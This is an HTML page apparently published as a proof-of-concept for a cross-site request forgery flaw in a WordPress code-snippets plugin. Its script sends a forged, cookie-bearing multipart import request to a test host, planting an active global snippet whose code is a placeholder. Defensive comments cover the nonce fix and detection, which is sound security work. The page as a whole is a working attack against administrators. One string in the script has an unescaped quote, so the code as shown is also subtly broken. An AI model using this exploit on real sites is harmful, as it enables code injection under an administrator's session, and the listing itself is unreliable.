This “flaw allowed anybody to forge a request on behalf of an administrator and inject executable code on a vulnerable site.”
<html>
<body>
<script>
/**
 * Proof-of-concept request builder for the request-forgery flaw quoted above
 * this listing.
 *
 * Builds a multipart/form-data POST to the plugin's import screen
 * (wp-admin/admin.php?page=import-snippets) on the test host and sends it with
 * the visitor's cookies for that host. The body carries one uploaded JSON
 * export holding a single snippet, plus the import form's ordinary fields.
 * None of the parts is an anti-CSRF token, so the request is only accepted if
 * the server-side handler processes imports without verifying one.
 *
 * Defensive reading:
 *  - Fix: every state-changing admin handler should verify a per-session
 *    nonce before doing any work (in WordPress, check_admin_referer() or
 *    wp_verify_nonce()), in addition to the capability check.
 *  - Detection: review POSTs to this endpoint whose Origin/Referer is not the
 *    site's own admin area, and imports that create snippets already marked
 *    active.
 *  - NOTE(review): cookies marked SameSite=Lax or Strict are not attached to
 *    a cross-site request like this one; confirm how the site's auth cookies
 *    are set before relying on that.
 *
 * Takes no arguments and returns nothing; its only effect is the request.
 */
function submitRequest()
{
var xhr = new XMLHttpRequest();
// Third argument `true` makes the request asynchronous.
xhr.open("POST", "http:\/\/waftesting.vhx.cloud:8080\/wp-admin\/admin.php?page=import-snippets", true);
// The Content-Type is set by hand so the boundary matches the hand-built body below.
// multipart/form-data is a content type browsers send cross-origin without a CORS
// preflight, so CORS settings do not keep the request from reaching the server;
// they only keep the sending page from reading the response.
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryIpMt0484nyfHOSdA");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
// Ask the browser to attach the visitor's cookies for the target host; this is
// what makes the request run "on behalf of" whoever is logged in there.
xhr.withCredentials = true;
// Multipart body, one part per form field: duplicate_action, the uploaded file,
// action, max_file_size and submit. There is no nonce/token part.
var body = "------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"duplicate_action\"\r\n" +
"\r\n" +
"ignore\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
// File part: a JSON snippet export. The single record has scope "global" and
// active "1"; its code field holds a placeholder, not a real payload.
// NOTE(review): presumably the import honoured the active flag - confirm
// against the affected plugin version.
"Content-Disposition: form-data; name=\"code_snippets_import_files[]\"; filename=\"code-snippets (2).json\"\r\n" +
"Content-Type: application/json\r\n" +
"\r\n" +
"{\"generator\":\"Code Snippets v2.13.3\",\"date_created\":\"2020-01-23 15:07\",\"snippets\":[{\"name\":\"PoC\",\"scope\":\"global\",\"code\":\"MALICIOUS CODE HERE",\"priority\":\"1\",\"active\":\"1\"}]}\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"save\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"max_file_size\"\r\n" +
"\r\n" +
"2097152\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Upload files and import\r\n" +
"------WebKitFormBoundaryIpMt0484nyfHOSdA--\r\n";
// Copy the string into a byte array, one byte per UTF-16 code unit, so the body
// is sent exactly as written instead of being re-encoded by the browser.
// (Uint8Array keeps only the low 8 bits of each code unit; the text here is ASCII.)
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
// The Blob has no type of its own; the Content-Type header set above is the one used.
xhr.send(new Blob([aBody]));
}
</script>
<!-- Manual trigger: the button is type="button", so it does not submit the form; clicking it only calls submitRequest(). -->
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>